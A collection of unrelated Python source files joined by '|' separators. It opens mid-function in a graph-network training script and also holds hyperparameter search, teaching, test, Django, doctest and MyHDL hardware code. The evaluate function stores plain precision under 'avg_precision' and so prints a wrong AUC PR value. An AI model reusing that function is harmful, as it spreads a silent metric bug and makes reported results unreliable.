splitter = ScaffoldSplitter()
elif dataset == "BACE":
splitter = ScaffoldSplitter()
elif dataset == "TOX21":
splitter = RandomSplitter()
train_inds, val_inds, test_inds = splitter.split(ds)
return {"train_inds": train_inds,
"val_inds": val_inds,
"test_inds": test_inds}
def run_train(config, data, inds):
"""
Sets splitter. Partitions train/val/test.
Loads model from config. Trains and evals.
Returns model and eval metrics.
"""
train_inds = inds["train_inds"]
val_inds = inds["val_inds"]
test_inds = inds["test_inds"]
model = keras_gcn(config)
loss, accuracy = gcn_train(model, data, config['num_epochs'], train_inds)
train_eval = evaluate(model, data, train_inds)
test_eval = evaluate(model, data, test_inds)
val_eval = evaluate(model, data, val_inds)
return model, {"train": train_eval,
"test": test_eval,
"val": val_eval}
def print_evals(eval_dict):
print("Accuracy: {0:.3f}".format(eval_dict["accuracy"]))
print("Precision: {0:.3f}".format(eval_dict["precision"]))
print("AUC ROC: {0:.3f}".format(eval_dict["roc_auc"]))
print("AUC PR: {0:.3f}".format(eval_dict["avg_precision"]))
print("eval time (s): {0:.3f}".format(eval_dict["eval_time"]))
def evaluate(model, data, inds, thresh=0.5):
t_test = time.time()
preds = np.concatenate([model.predict([data["norm_adjs"][i][np.newaxis, :, :],
data["node_features"][i][np.newaxis, :, :]])
for i in inds], axis=0)
preds = preds[:,1]
labels = np.array([np.argmax(data["labels_one_hot"][i]) for i in inds])
roc_auc = roc_auc_score(labels, preds)
roc_curve_ = roc_curve(labels, preds)
precision = precision_score(labels, (preds > thresh).astype('int'))
acc = accuracy_score(labels, (preds > thresh).astype('int'))
ap = average_precision_score(labels, preds)
pr_curve_ = precision_recall_curve(labels, preds)
return {"accuracy": acc,
"roc_auc": roc_auc,
"precision": precision,
"avg_precision": precision,
"eval_time": (time.time() - t_test),
"roc_curve": roc_curve_,
"pr_curve": pr_curve_}
def print_eval_avg(eval_dict, split, metric):
N = len(eval_dict.keys())
vals = [eval_dict[i][split][metric] for i in range(N)]
return "{0:.3f} +/- {1:.3f}".format(np.mean(vals), np.std(vals))
def occlude_and_predict(X_arr, A_arr, masks, thresh, model):
"""
COPIES and mutates input data
Returns predicted CLASS (not prob.) of occluded data
"""
#Copy node features. We need to edit it.
X_arr_occ = X_arr.copy()
#Occlude activated nodes for each explain method
#NB: array shape is (batch, N, D)
# and batches are always of size 1
X_arr_occ[0, masks > thresh, :] = 0
    #Predict on the occluded input. Save the predicted class
prob_occ = model.predict_on_batch(x=[A_arr, X_arr_occ])
y_hat_occ = prob_occ.argmax()
return y_hat_occ
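# Hedged usage sketch (the mask values are made up): given per-node relevance
# scores from some explanation method, occlude the nodes scoring above `thresh`
# and check whether the predicted class changes.
#
#   masks = np.array([0.9, 0.1, 0.7, 0.2])      # one score per node
#   y_occ = occlude_and_predict(X_arr, A_arr, masks, 0.5, model)
#   flipped = y_occ != model.predict_on_batch(x=[A_arr, X_arr]).argmax()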
|
import numpy as np
import copy
from supervised.algorithms.registry import AlgorithmsRegistry
from supervised.algorithms.registry import BINARY_CLASSIFICATION
class HillClimbing:
"""
Example params are in JSON format:
{
"booster": ["gbtree", "gblinear"],
"objective": ["binary:logistic"],
"eval_metric": ["auc", "logloss"],
"eta": [0.0025, 0.005, 0.0075, 0.01, 0.025, 0.05, 0.075, 0.1]
}
"""
@staticmethod
def get(params, ml_task, seed=1):
np.random.seed(seed)
keys = list(params.keys())
for k in [
"num_class",
"model_type",
"seed",
"ml_task",
"explain_level",
"model_architecture_json",
"n_jobs",
]:
if k in keys:
keys.remove(k)
model_type = params["model_type"]
if model_type == "Baseline":
return [None, None]
model_info = AlgorithmsRegistry.registry[ml_task][model_type]
model_params = model_info["params"]
permuted_keys = np.random.permutation(keys)
key_to_update = None
values = None
for key_to_update in permuted_keys:
values = model_params[key_to_update]
if len(values) > 1:
break
if values is None:
return [None, None]
left, right = None, None
for i, v in enumerate(values):
if v == params[key_to_update]:
if i + 1 < len(values):
right = values[i + 1]
if i - 1 >= 0:
left = values[i - 1]
params_1, params_2 = None, None
if left is not None:
params_1 = copy.deepcopy(params)
params_1[key_to_update] = left
if right is not None:
params_2 = copy.deepcopy(params)
params_2[key_to_update] = right
if params_1 is not None and "model_architecture_json" in params_1:
del params_1["model_architecture_json"]
if params_2 is not None and "model_architecture_json" in params_2:
del params_2["model_architecture_json"]
return [params_1, params_2]
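# Hedged usage sketch (parameter values are illustrative; the actual value
# grids live in AlgorithmsRegistry): get() picks one tunable key at random and
# returns copies of params with that key's two neighbouring grid values, or
# None on a side where the current value already sits at the grid edge.
#
#   params = {"model_type": "Xgboost", "eta": 0.05, "seed": 1}
#   left, right = HillClimbing.get(params, BINARY_CLASSIFICATION, seed=1)
#   # e.g. left["eta"] == 0.025 and right["eta"] == 0.075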
|
class Pessoa:
olhos = 2
def __init__(self, *filhos, nome=None, idade=38):
self.idade = idade
self.nome = nome
self.filhos = list(filhos)
def cumprimentar(self):
return f'Olá {id(self)}'
@staticmethod
def metodo_estatico():
return 42
@classmethod
def nome_e_atributos_de_classe(cls):
return f'{cls} - olhos {cls.olhos}'
if __name__ == '__main__':
camillo = Pessoa(nome='Camillo')
hugo = Pessoa(camillo, nome='Hugo')
print(Pessoa.cumprimentar(hugo))
print(id(hugo))
print(hugo.cumprimentar())
print(hugo.nome)
print(hugo.idade)
for filho in hugo.filhos:
print(filho.nome)
hugo.sobrenome = 'Barbosa'
del hugo.filhos
hugo.olhos = 1
del hugo.olhos
print(hugo.__dict__)
print(camillo.__dict__)
Pessoa.olhos = 3
print(Pessoa.olhos)
print(hugo.olhos)
print(camillo.olhos)
print(id(Pessoa.olhos), id(hugo.olhos), id(camillo.olhos))
print(Pessoa.metodo_estatico(), hugo.metodo_estatico())
print(Pessoa.nome_e_atributos_de_classe(), hugo.metodo_estatico())
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .datastructures import SortedDict
from .decorators import retry
from .network import get_localhost_ip
from .network import host2ip
from .network import force_ip
from .network import device_from_ip
from .shell import execute
from .shell import ScriptRunner
from .shortcuts import host_iter
from .shortcuts import hosts
from .shortcuts import get_current_user
from .shortcuts import get_current_username
from .shortcuts import split_hosts
from .strings import COLORS
from .strings import color_text
from .strings import mask_string
from .strings import state_format
from .strings import state_message
__all__ = ('SortedDict',
'retry',
'get_localhost_ip', 'host2ip', 'force_ip', 'device_from_ip',
'ScriptRunner', 'execute',
'host_iter', 'hosts', 'get_current_user', 'get_current_username',
'split_hosts', 'COLORS', 'color_text', 'mask_string',
'state_format', 'state_message')
|
from encomp.constants import CONSTANTS
from encomp.units import Quantity
from encomp.utypes import Density, Pressure
def test_CONSTANTS():
assert isinstance(CONSTANTS.default_density, Quantity[Density])
assert isinstance(CONSTANTS.normal_conditions_pressure, Quantity[Pressure])
|
from __future__ import annotations
from unittest import TestCase
from jsonclasses.exceptions import ValidationException
from tests.classes.simple_article import SimpleArticle
class TestStr(TestCase):
def test_str_is_str_after_assigned(self):
article = SimpleArticle(title='Lak Lak')
self.assertEqual(article._data_dict,
{'title': 'Lak Lak', 'content': None})
def test_str_raises_if_value_is_not_string(self):
article = SimpleArticle(title=66)
with self.assertRaises(ValidationException) as context:
article.validate()
self.assertEqual(len(context.exception.keypath_messages), 1)
self.assertEqual(context.exception.keypath_messages['title'],
"Value '66' at 'title' should be str.")
def test_str_is_str_when_tojson(self):
article = SimpleArticle(title='Lak Lak')
self.assertEqual(article.tojson(),
{'title': 'Lak Lak', 'content': None})
|
from .dice import Dice
|
import unittest
import pandas as pd
import pandas.testing as pdt
import biom
import numpy as np
import numpy.testing as npt
from qiime2 import Artifact
from microsetta_public_api.models._taxonomy import GroupTaxonomy, Taxonomy
from microsetta_public_api.exceptions import (DisjointError, UnknownID,
SubsetError)
from microsetta_public_api.utils import DataTable, create_data_entry
class TaxonomyTests(unittest.TestCase):
def setUp(self):
self.table = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
self.taxonomy_df.set_index('Feature ID', inplace=True)
self.table_ranks = self.table.rankdata(inplace=False)
self.table2 = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-X', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.taxonomy2_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-X', 'a; b; c; d; e', 0.34],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
self.taxonomy2_df.set_index('Feature ID', inplace=True)
self.taxonomy_superset_df = self.taxonomy2_df.copy()
self.taxonomy_superset_df.loc['feature-2'] = \
self.taxonomy_df.loc['feature-2']
self.taxonomy_greengenes_df = pd.DataFrame(
[['feature-1', 'k__a; p__b; o__c', 0.123],
['feature-2', 'k__a; p__b; o__c;f__d;g__e', 0.34],
['feature-3', 'k__a; p__f; o__g; f__h', 0.678]],
columns=['Feature ID', 'Taxon', 'Confidence'])
self.taxonomy_greengenes_df.set_index('Feature ID', inplace=True)
self.table2_ranks = self.table2.rankdata(inplace=False)
# variances
self.table_vars = biom.Table(np.array([[0, 1, 2],
[2, 4, 6],
[3, 0, 1]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
self.no_variances = biom.Table(np.zeros((3, 3)),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3'])
def test_qza_integration(self):
table_qza = Artifact.import_data(
"FeatureTable[Frequency]", self.table
)
taxonomy_qza = Artifact.import_data(
"FeatureData[Taxonomy]", self.taxonomy_df,
)
table = table_qza.view(biom.Table)
taxonomy_df = taxonomy_qza.view(pd.DataFrame)
taxonomy = Taxonomy(table, taxonomy_df)
taxonomy.get_group(['sample-1', 'sample-2'], 'foo')
def test_get_sample_ids(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
npt.assert_equal(taxonomy._get_sample_ids(), ['sample-1', 'sample-2',
'sample-3'])
def test_get_feature_ids(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
npt.assert_equal(taxonomy._get_feature_ids(), ['feature-1',
'feature-2',
'feature-3'])
def test_init_no_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
self.assertEqual(taxonomy._table, self.table.copy().norm())
self.assertEqual(taxonomy._variances, self.no_variances)
pdt.assert_frame_equal(taxonomy._features, self.taxonomy_df)
def test_init_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, self.table_vars)
self.assertEqual(taxonomy._table, self.table.copy().norm())
self.assertEqual(taxonomy._variances, self.table_vars)
pdt.assert_frame_equal(taxonomy._features, self.taxonomy_df)
self.assertEqual(list(taxonomy._table.ids(axis='observation')),
list(taxonomy._features.index))
self.assertEqual(list(taxonomy._table.ids(axis='observation')),
list(taxonomy._variances.ids(axis='observation')))
def test_init_disjoint(self):
with self.assertRaisesRegex(SubsetError,
"not a subset"):
Taxonomy(self.table, self.taxonomy2_df)
with self.assertRaisesRegex(SubsetError,
"not a subset"):
Taxonomy(self.table2, self.taxonomy_df)
def test_init_allow_taxonomy_superset(self):
Taxonomy(self.table, self.taxonomy_superset_df)
def test_init_disjoint_variances(self):
bad = self.table_vars.copy()
bad.update_ids({'sample-1': 'sample-bad'}, inplace=True, strict=False)
with self.assertRaisesRegex(DisjointError,
"Table and variances are disjoint"):
Taxonomy(self.table, self.taxonomy_df, bad)
def _clean_sort_df(self, df, cols):
df.sort_values(cols, inplace=True)
df.reset_index(drop=True, inplace=True)
def test_init_rankdata(self):
exp = pd.DataFrame([['c', 'sample-1', 1.],
['c', 'sample-2', 1],
['c', 'sample-3', 2],
['g', 'sample-1', 2],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = taxonomy._ranked
self._clean_sort_df(obs, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs, exp, check_like=True)
def test_init_rankdata_order(self):
exp = ['c', 'g']
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = list(taxonomy._ranked_order.index)
self.assertEqual(obs, exp)
def test_ranks_sample(self):
exp = pd.DataFrame([['c', 'sample-1', 1.],
['c', 'sample-2', 1],
['c', 'sample-3', 2],
['g', 'sample-1', 2],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs = taxonomy.ranks_sample(5)
self._clean_sort_df(obs, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs, exp, check_like=True)
obs = taxonomy.ranks_sample(4)
self.assertIn(sorted(obs['Taxon'].values), [['c', 'c', 'c', 'g'],
['c', 'c', 'g', 'g']])
obs = taxonomy.ranks_sample(100)
self.assertEqual(sorted(obs['Taxon'].values),
['c', 'c', 'c', 'g', 'g'])
def test_ranks_specific(self):
exp_1 = pd.DataFrame([['c', 'sample-1', 1.],
['g', 'sample-1', 2]],
columns=['Taxon', 'Sample ID', 'Rank'])
exp_2 = pd.DataFrame([['c', 'sample-2', 1.]],
columns=['Taxon', 'Sample ID', 'Rank'])
exp_3 = pd.DataFrame([['c', 'sample-3', 2.],
['g', 'sample-3', 1]],
columns=['Taxon', 'Sample ID', 'Rank'])
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
obs_1 = taxonomy.ranks_specific('sample-1')
obs_2 = taxonomy.ranks_specific('sample-2')
obs_3 = taxonomy.ranks_specific('sample-3')
self._clean_sort_df(obs_1, ['Taxon', 'Sample ID'])
self._clean_sort_df(obs_2, ['Taxon', 'Sample ID'])
self._clean_sort_df(obs_3, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_1, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_2, ['Taxon', 'Sample ID'])
self._clean_sort_df(exp_3, ['Taxon', 'Sample ID'])
pdt.assert_frame_equal(obs_1, exp_1, check_like=True)
pdt.assert_frame_equal(obs_2, exp_2, check_like=True)
pdt.assert_frame_equal(obs_3, exp_3, check_like=True)
def test_ranks_specific_missing_id(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
with self.assertRaisesRegex(UnknownID, 'foobar'):
taxonomy.ranks_specific('foobar')
def test_ranks_order(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
exp = ['c', 'g']
obs = taxonomy.ranks_order()
self.assertEqual(obs, exp)
exp = ['c', 'g']
obs = taxonomy.ranks_order(['g', 'c'])
self.assertEqual(obs, exp)
exp = ['c']
obs = taxonomy.ranks_order(['c', ])
self.assertEqual(obs, exp)
def test_ranks_order_unknown(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, rank_level=2)
with self.assertRaisesRegex(UnknownID, "foobar"):
taxonomy.ranks_order(["foobar", ])
with self.assertRaisesRegex(UnknownID, "foobar"):
taxonomy.ranks_order(["c", "foobar", ])
def test_index_taxa_prevalence(self):
table = biom.Table(np.array([[0, 1, 2, 0],
[2, 4, 6, 1],
[3, 0, 0, 0]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3', 'sample-4'])
taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
tax = Taxonomy(table, taxonomy_df)
exp_unique = pd.Series([False, False, True],
index=['feature-1', 'feature-2', 'feature-3'])
exp_prev = pd.Series([0.5, 1., 0.25],
index=['feature-1', 'feature-2', 'feature-3'])
pdt.assert_series_equal(exp_unique, tax.feature_uniques)
pdt.assert_series_equal(exp_prev, tax.feature_prevalence)
def test_rare_unique(self):
        # feature 1 is "rare" for samples 2 and 3 at a threshold of <= 50%
# feature 3 is "unique" to sample 1
table = biom.Table(np.array([[0, 1, 2, 0],
[2, 4, 6, 1],
[3, 0, 0, 0]]),
['feature-1', 'feature-2', 'feature-3'],
['sample-1', 'sample-2', 'sample-3', 'sample-4'])
taxonomy_df = pd.DataFrame([['feature-1', 'a; b; c', 0.123],
['feature-2', 'a; b; c; d; e', 0.345],
['feature-3', 'a; f; g; h', 0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
tax = Taxonomy(table, taxonomy_df)
exp = {'sample-1': {'rare': {'feature-3': 0.25},
'unique': ['feature-3', ]},
'sample-2': {'rare': {'feature-1': 0.5},
'unique': None},
'sample-3': {'rare': {'feature-1': 0.5},
'unique': None},
'sample-4': {'rare': None, 'unique': None}}
for k, e in exp.items():
obs = tax.rare_unique(k, rare_threshold=0.51)
self.assertEqual(obs, e)
def test_bp_tree(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
bp_tree = taxonomy.bp_tree
exp_parens = [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0]
obs_parens = list(bp_tree.B)
self.assertListEqual(exp_parens, obs_parens)
exp_names = [
'a', 'b', 'c', 'feature-1', 'd', 'e', 'feature-2', 'f', 'g', 'h',
'feature-3',
]
obs_names = []
for i in range(len(bp_tree.B)):
name = bp_tree.name(i)
if name is not None:
obs_names.append(name)
self.assertListEqual(exp_names, obs_names)
def test_get_group(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
exp = GroupTaxonomy(name='sample-2',
taxonomy='((((feature-1,((feature-2)e)d)c)b)a);',
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
obs = taxonomy.get_group(['sample-2'])
self.assertEqual(obs, exp)
def test_get_group_multiple(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
exp = GroupTaxonomy(name='foo',
taxonomy='((((feature-1,((feature-2)e)d)c)b,(((feature-3)h)g)f)a);', # noqa
features=['feature-1', 'feature-2', 'feature-3'],
feature_values=[1. / 10, 6. / 10, 3. / 10],
feature_variances=[0.0, 0.0, 0.0])
obs = taxonomy.get_group(['sample-1', 'sample-2'], 'foo')
self.assertEqual(obs.name, exp.name)
self.assertEqual(obs.taxonomy, exp.taxonomy)
self.assertEqual(obs.features, exp.features)
npt.assert_almost_equal(obs.feature_values, exp.feature_values)
self.assertEqual(obs.feature_variances, exp.feature_variances)
def test_get_group_with_variances(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df, self.table_vars)
exp = GroupTaxonomy(name='sample-1',
taxonomy='((((((feature-2)e)d)c)b,(((feature-3)h)g)f)a);', # noqa
features=['feature-2', 'feature-3'],
feature_values=[2. / 5, 3. / 5],
feature_variances=[2.0, 3.0])
obs = taxonomy.get_group(['sample-1'])
self.assertEqual(obs, exp)
def test_get_group_missing(self):
taxonomy = Taxonomy(self.table, self.taxonomy_df)
with self.assertRaisesRegex(UnknownID, "sample-X does not exist"):
taxonomy.get_group(['sample-X'])
def test_get_counts(self):
taxonomy_df = pd.DataFrame([['feature-1', 'k__a; p__b; c__c', 0.123],
['feature-2',
'k__a; p__b; c__c; o__d; f__e', 0.345],
['feature-3', 'k__a; p__f; c__g; o__h',
0.678]],
columns=['Feature ID', 'Taxon',
'Confidence'])
taxonomy_df.set_index('Feature ID', inplace=True)
taxonomy = Taxonomy(self.table, taxonomy_df)
expected = [('Kingdom', {'a': 3}), ('Phylum', {'b': 2, 'f': 1})]
for level, exp in expected:
obs = taxonomy.get_counts(level)
self.assertEqual(obs, exp)
obs = taxonomy.get_counts(level, samples=['sample-1', 'sample-2',
'sample-3'])
self.assertEqual(obs, exp)
expected_batch = [('sample-1', [('Kingdom', {'a': 2}),
('Phylum', {'b': 1, 'f': 1})]),
('sample-2', [('Kingdom', {'a': 2}),
('Phylum', {'b': 2})]),
('sample-3', [('Kingdom', {'a': 3}),
('Phylum', {'b': 2, 'f': 1})])]
for sample, expected in expected_batch:
for level, exp in expected:
obs = taxonomy.get_counts(level, samples=sample)
self.assertEqual(obs, exp)
def test_presence_data_table(self):
taxonomy = Taxonomy(self.table, self.taxonomy_greengenes_df,
self.table_vars)
obs = taxonomy.presence_data_table(['sample-1', 'sample-2'])
exp_columns = ['sampleId', 'Kingdom', 'Phylum', 'Class', 'Order',
'Family', 'Genus', 'Species', 'relativeAbundance']
DataEntry = create_data_entry(exp_columns)
exp = DataTable(
data=[
DataEntry(**{
'sampleId': 'sample-1',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': 'd',
'Genus': 'e',
'Species': None,
'relativeAbundance': 2. / 5,
}),
DataEntry(**{
'sampleId': 'sample-1',
'Kingdom': 'a',
'Phylum': 'f',
'Class': None,
'Order': 'g',
'Family': 'h',
'Genus': None,
'Species': None,
'relativeAbundance': 3. / 5,
}),
DataEntry(**{
'sampleId': 'sample-2',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': None,
'Genus': None,
'Species': None,
'relativeAbundance': 1. / 5,
}),
DataEntry(**{
'sampleId': 'sample-2',
'Kingdom': 'a',
'Phylum': 'b',
'Class': None,
'Order': 'c',
'Family': 'd',
'Genus': 'e',
'Species': None,
'relativeAbundance': 4. / 5,
}),
],
columns=exp_columns,
)
self.assertListEqual([{'data': col} for col in exp.columns],
obs.columns)
        # We wouldn't want to do this on a huge dataframe, but it checks that
        # there is a row of obs corresponding to each row of exp.
exp_df = pd.DataFrame(exp.data)
obs_df = pd.DataFrame(obs.data)
obs_df_copy = obs_df.copy()
for e_idx, row_exp in exp_df.iterrows():
for o_idx, row_obs in obs_df.iterrows():
if row_exp.eq(row_obs).all():
obs_df_copy.drop(index=o_idx, inplace=True)
break
self.assertTrue(obs_df_copy.empty)
class GroupTaxonomyTests(unittest.TestCase):
def setUp(self):
self.tstr = '(((((feature-2)e)d,feature-1)c)b)a;'
self.obj = GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
def test_init(self):
self.assertEqual(self.obj.name, 'sample-2')
self.assertEqual(self.obj.taxonomy, self.tstr)
self.assertEqual(self.obj.features, ['feature-1', 'feature-2'])
self.assertEqual(self.obj.feature_values, [1. / 5, 4. / 5])
self.assertEqual(self.obj.feature_variances, [0.0, 0.0])
def test_init_tree_missing_feature(self):
with self.assertRaisesRegex(UnknownID,
"is not in the taxonomy."):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-3'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
def test_init_feature_value_lengths(self):
with self.assertRaisesRegex(ValueError,
"length mismatch"):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr + 'feature-3',
features=['feature-1', 'feature-2', 'feature-3'],
feature_values=[1. / 5, 4. / 5],
feature_variances=[0.0, 0.0])
with self.assertRaisesRegex(ValueError,
"length mismatch"):
GroupTaxonomy(name='sample-2',
taxonomy=self.tstr,
features=['feature-1', 'feature-2'],
feature_values=[1. / 5, ],
feature_variances=[0.0, 0.0])
def test_to_dict(self):
exp = {'name': 'sample-2',
'taxonomy': self.tstr,
'features': ['feature-1', 'feature-2'],
'feature_values': [1. / 5, 4. / 5],
'feature_variances': [0.0, 0.0]}
obs = self.obj.to_dict()
self.assertEqual(obs, exp)
def test_str(self):
exp = str(self.obj.to_dict())
obs = str(self.obj)
self.assertEqual(obs, exp)
if __name__ == '__main__':
unittest.main()
|
from django.db.models.expressions import Func, Expression
from pragmatic.models.expressions import F, Value
class Round(Func):
function = 'ROUND'
arity = 2
# https://github.com/primal100/django_postgres_extensions
class SimpleFunc(Func):
def __init__(self, field, *values, **extra):
if not isinstance(field, Expression):
field = F(field)
if values and not isinstance(values[0], Expression):
values = [Value(v) for v in values]
super(SimpleFunc, self).__init__(field, *values, **extra)
class ArrayAppend(SimpleFunc):
function = 'ARRAY_APPEND'
class ArrayPrepend(Func):
function = 'ARRAY_PREPEND'
def __init__(self, value, field, **extra):
if not isinstance(value, Expression):
value = Value(value)
field = F(field)
super(ArrayPrepend, self).__init__(value, field, **extra)
class ArrayRemove(SimpleFunc):
function = 'ARRAY_REMOVE'
class ArrayReplace(SimpleFunc):
function = 'ARRAY_REPLACE'
class ArrayPosition(SimpleFunc):
function = 'ARRAY_POSITION'
class ArrayPositions(SimpleFunc):
function = 'ARRAY_POSITIONS'
class ArrayLength(SimpleFunc):
function = 'ARRAY_LENGTH'
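# Hedged usage sketch (the Post model and its "tags" ArrayField are
# hypothetical, not defined in this project):
#
#   Post.objects.filter(pk=1).update(tags=ArrayAppend('tags', 'django'))
#   Post.objects.update(tags=ArrayRemove('tags', 'outdated'))
#   Post.objects.annotate(n_tags=ArrayLength('tags', 1)).filter(n_tags__gt=3)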
|
##############################################################################
#
# Copyright (c) 2003 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Extension to use doctest tests as unit tests
This module provides a DocTestSuite contructor for converting doctest
tests to unit tests.
$Id: doctestunit.py 28304 2004-10-31 17:59:45Z jim $
"""
from doctest import DocFileSuite, DocTestSuite
from doctest import debug_src, debug
def pprint():
from pprint import PrettyPrinter
def pprint(ob, **opts):
if 'width' not in opts:
opts['width'] = 1
return PrettyPrinter(**opts).pprint(ob)
return pprint
pprint = pprint()
|
from myhdl import block, instance
@block
def serdes_1_to_5(use_phase_detector, data_in_p, data_in_n, rx_io_clock,
rx_serdes_strobe, reset, g_clock, bit_slip, data_out,
diff_term='TRUE', bit_slip_enable='TRUE', sim_tap_delay = 49):
"""
    The block converts the serial data stream into 5-bit parallel data. During
    conversion this block is replaced with the Xilinx primitives IODELAY2 and ISERDES2.
Args:
use_phase_detector: The signal is used by the xilinx primitive
data_in_p: The input differential data
data_in_n: The input differential data
rx_io_clock: The clock from the input side (serial data)
rx_serdes_strobe: The signal is used by the xilinx primitive
reset: The signal is used by the xilinx primitive
g_clock: The clock on the output side (parallel data)
bit_slip: The signal is used by the xilinx primitive
data_out: The output parallel data (5-bit)
diff_term: The parameter is used by the xilinx primitive
bit_slip_enable: The parameter is used by the xilinx primitive
sim_tap_delay: The parameter is used by the xilinx primitive
Returns:
myhdl.instances() : A list of myhdl instances.
"""
data = ['0' for _ in range(5)]
@instance
def deserialize():
while True:
yield rx_io_clock.posedge
data.append('1' if data_in_p else '0')
data.pop(0)
@instance
def assign():
while True:
yield g_clock.posedge
data_out.next = int(''.join(data[::-1]), 2)
return deserialize, assign
serdes_1_to_5.verilog_code = """
assign busy_data = busys ;
assign cal_data_slave = cal_data_sint ;
/////////////////////////////////////////////////
//
// IDELAY Calibration FSM
//
/////////////////////////////////////////////////
always @ (posedge $g_clock or posedge $reset)
begin
if ($reset == 1'b1) begin
state <= 0 ;
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
counter <= 9'h000 ;
enable <= 1'b0 ;
mux <= 1'h1 ;
end
else begin
counter <= counter + 9'h001 ;
if (counter[8] == 1'b1) begin
counter <= 9'h000 ;
end
if (counter[5] == 1'b1) begin
enable <= 1'b1 ;
end
if (state == 0 && enable == 1'b1) begin // Wait for IODELAY to be available
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
rst_data <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 1 ;
end
end
else if (state == 1) begin // Issue calibrate command to both master and slave, needed for simulation, not for the silicon
cal_data_master <= 1'b1 ;
cal_data_sint <= 1'b1 ;
if (busy_data_d == 1'b1) begin // and wait for command to be accepted
state <= 2 ;
end
end
else if (state == 2) begin // Now RST master and slave IODELAYs needed for simulation, not for the silicon
cal_data_master <= 1'b0 ;
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b0) begin
rst_data <= 1'b1 ;
state <= 3 ;
end
end
else if (state == 3) begin // Wait for IODELAY to be available
rst_data <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 4 ;
end
end
else if (state == 4) begin // Wait for occasional enable
if (counter[8] == 1'b1) begin
state <= 5 ;
end
end
else if (state == 5) begin // Calibrate slave only
if (busy_data_d == 1'b0) begin
cal_data_sint <= 1'b1 ;
state <= 6 ;
end
end
else if (state == 6) begin // Wait for command to be accepted
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b1) begin
state <= 7 ;
end
end
else if (state == 7) begin // Wait for all IODELAYs to be available, ie CAL command finished
cal_data_sint <= 1'b0 ;
if (busy_data_d == 1'b0) begin
state <= 4 ;
end
end
end
end
